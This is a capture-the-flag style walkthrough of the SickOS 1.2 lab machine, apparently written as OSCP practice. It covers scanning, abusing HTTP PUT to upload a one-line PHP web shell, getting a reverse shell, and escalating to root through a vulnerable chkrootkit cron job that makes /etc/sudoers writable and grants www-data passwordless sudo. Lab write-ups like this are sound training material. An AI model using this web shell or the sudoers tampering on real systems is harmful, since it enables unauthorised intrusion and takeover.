Sick OS 1.2

SickOS 1.2 a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.

First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.

SickOS 1.2 netdiscover

Next I ran threader3000 and let it run its recommended nmap scan.

SickOS 1.2 threader3000 nmap

It appears that SSH and HTTP are open. I pulled up the main website and was presented with the following.

SickOS 1.2 website

I decided to run gobuster dir -u http://[machine ip] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt -t 50 to enumerate the website. It uncovered a /test subdirectory.

SickOS 1.2 gobuster

I navigated to this page, and it appears to list contents of this directory, which has nothing in it.

SickOS 1.2 /test

I looked around and didn’t see anything we could immediately exploit and there were not any other uncovered pages. I decided to use curl -X OPTIONS -v http://[machine ip]/test to see what was allowed in this directory. I uncovered that PUT was allowed.

SickOS 1.2 curl

With this discovery, I used nmap [machine ip] -p 80 –script http-put –script-args http-put.url=’/test/shell.php’, http-put.file=’[location to reverse shell file]’. I used the reverse shell from PenTestMonkey.

SickOS 1.2 nmap http-put

I then tested this with a reverse shell, but unfortunately it didn’t work. I instead created a php file with <?php $cmd=$_GET[‘cmd’];system($cmd);?> in it, and saved it as CommandExecution.php. I then uploaded it the same way I uploaded the reverse shell in the prior step.

SickOS 1.2 nmap http-put 2

Next, I opened a reverse shell listener on port 443 on my attacker computer.

Sick OS 1.2 nc listener

After trial and error, I discovered that running a Python reverse shell with the command injection script worked, and gave us an initial foothold on the victim PC.

Sick OS 1.2 python reverse shell

Next, I ran who and it revealed we have a shell as www-data, I then ran python -c ‘import pty; ptw.spawn("/bin/sh")’ to upgrade my shell to a TTY shell.

Sick OS 1.2 www-data shell

Next, I tried navigating to the tmp directory and using wget to copy over linpeas for enumeration, but that was unsuccessful. However, we knew we could use nmap (as we had done twice earlier) to copy over files. I did this to copy over linpeas.

Sick OS 1.2 nmap http-put 3

Next, I ran chmod +x linpeas.sh to make linpeas executable and started it with ./linpeas.sh.

Sick OS 1.2 chmod +x

Linpeas returned some interesting information.

Sick OS 1.2 linpeas 1

Sick OS 1.2 linpeas 2

Sick OS 1.2 linpeas 3

It appears that the kernel is exploitable and gcc is installed to compile exploits. chrootkit is also setup as a cron job and some versions are vulnerable to exploit. I ran chkrootkit -V to see the version that was installed.

Sick OS 1.2 chkrootkit -V

Back on our attacker pc, I ran searchsploit chkrootkit. One of the results returns the version that is installed on the victim machine!

Sick OS 1.2 searchsploit chkrootkit

Next, I ran searchsploit -x 33899 to view the contents of this file. It tells you how to exploit **chkrootkit **.

SickOS 1.2 searchsploit -x 33899

I navigated to the tmp folder with cd /tmp and ran echo “chmod 777 /etc/sudoers” > update and made it executable with chmod +x update. I then waited a couple of minutes for this to be triggered.

Sick OS 1.2 update file

I then ran ls -al /etc |grep sudoers, which showed that the permissions on this file had been updated!

Sick OS 1.2 ls -al /etc

Next, I ran echo “www-data ALL=NOPASSWD: ALL” » /etc/sudoers to give the www-data the ability to run anything as root with sudo with no password.

Sick OS 1.2 modify /etc/sudoers

Next, I ran sudo su, which didn’t work because permissions on /etc/sudoers should be 440.

Sick OS 1.2 sudo su failed

Next, I went back to the /tmp directory and updated the update file with echo “chmod 0440 /etc/sudoers” > update. I waited a couple of minutes for this to take effect.

Sick OS 1.2 modify update file

I then ran ls -al /etc|grep sudoers, which showed the permissions had been changed back to the proper permissions. I then ran sudo su which gave me a root shell.

Sick OS 1.2 modify sudoers permissions

I then ran cd /root followed by ls -al. There was a flag file present, which I viewed the contents of with cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt, which showed the information below!

Sick OS 1.2 root flag